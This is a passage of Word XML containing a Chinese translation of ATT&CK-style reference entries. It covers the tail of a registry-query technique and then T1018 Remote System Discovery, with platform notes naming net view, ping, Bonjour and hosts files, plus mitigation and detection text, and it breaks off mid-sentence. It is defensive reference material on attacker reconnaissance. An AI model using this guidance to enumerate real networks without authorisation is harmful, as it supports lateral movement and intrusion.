        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4BB6F9" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B74526" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E4A2B7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>系统和网络发现技术通常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>攻击者试图</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>了解环境的整个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>过程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不应孤立地看待数据和事件，而应将其视为可能导致其他活动的一系列行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>例如横向移动</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C430D23" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互的</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是实用程序</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>eg</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行，或者运行中的恶意软件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些恶意软件可能会通过</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与注册表</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互。可以通过进程和命令行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控来</w:t>
      </w:r>
      <w:r>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否</w:t>
      </w:r>
      <w:r>
        <w:t>有实用程序通过命令行调用来查询注册表。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>可能会使用带</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内置功能的远程访问工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows API</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互以收集信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也</w:t>
      </w:r>
      <w:r>
        <w:t>可能会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135BDC92" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="007526C7" w14:paraId="0B95BCE7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4629933F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>T1018</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4402B94B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>技术：发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="378B512E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76B630DE" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>：用户，管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="467DA8B6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络协议</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>分析</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，进程监控，网络</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>进程使用，</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DBE35E4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>RedHuntLabs (@redhuntlabs)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65265B9F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A7CB11A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="000D0303" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA2FB59" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会尝试通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机名或网络上其他可用于从当前系统进行横向移动的逻辑标识符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取其他系统的列表。远程访问工具中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会带</w:t>
      </w:r>
      <w:r>
        <w:t>此功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。一旦启动</w:t>
      </w:r>
      <w:r>
        <w:t>，就可以实现此目的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统</w:t>
      </w:r>
      <w:r>
        <w:t>中的实用程序也可以用来实现此目的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者还</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用本地主机文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程</w:t>
      </w:r>
      <w:r>
        <w:t>系统的</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址映射。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43917B6B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F389BE7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取此信息的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具和命令包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Net</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>ping</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>net view</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\Windows\System32\Drivers\etc\hosts</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有助于</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>深入了解系统上现有的主机名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C1B333" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170493E8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:t>Mac</w:t>
      </w:r>
      <w:r>
        <w:t>系统中特有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bonjour</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议用于在同一广播域中发现其他</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mac</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统。诸如</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之类的实用程序可用于收集远程系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/etc/hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有助于</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>深入了解系统上现有的主机名到</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AADFCF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2758C857" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>诸如</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之类的实用程序可用于收集远程系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/etc/hosts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:t>内容有助于</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>深入了解系统上现有的主机名到</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00093E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140A77AB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="000D0303" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709D883A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6680003F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57964F5F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="005A7988" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统和网络发现技术通常用在攻击者试图了解环境的整个操作</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>过程</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。不应孤立地看待数据和事件，而应将其视为可能导致其他活动的一系列行为</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一部分，</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>例如横向移动</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6FCB39" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00355C2E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与合法</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>远程系统发现相关的</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
